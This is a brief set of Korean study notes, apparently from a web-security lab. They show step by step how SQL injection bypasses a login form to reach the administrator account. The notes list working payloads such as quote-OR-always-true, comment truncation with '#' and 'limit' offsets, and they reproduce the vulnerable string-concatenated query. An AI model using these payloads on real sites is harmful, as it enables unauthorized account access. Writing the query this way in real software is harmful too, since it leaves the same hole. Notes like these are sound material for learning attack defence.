관리자계정을 모르지만 관리자 계정으로 접속하기
ID: doldol PW: dol1234가 주어졌다.
-> 주어진 ID PW 활용
-> POST방식, cookie 인증x
ID: doldol'and'1'='1
PW: dol1234(doldol에 맞는 비밀번호)
-> WHERE id = ''이외 괄호 있는지 체크
-> 로그인 성공 괄호x
ID: doldol'#
PW:1(아무거나)
-> 로그인 성공
-> 식별인증 동시라고 생각
ID: doldol'or'1'='1
PW: dol1234
-> 로그인 성공
-> 항상 참이기 때문에 항상 참을 반환 -> 모든 데이터를 반환
ID: doldol'or'1'='1' limit 0,1#
PW: 1(아무거나) -> 인증식별 동시라서 주석 때문에
limit 순서(0부터) 나타낼갯수
limit 순서(0부터) 나타낼갯수 2개 넘게 해도 1번째 걸로 로그인됨
limit으로 2번째 계정으로 접속

-> 그러나 첫번째 계정은 관리자 계정x
ID: doldol'or'1'='1' limit 1,1#
PW: 1(아무거나)

$sql="SELECT * FROM users WHERE id='$id' and password='$password'";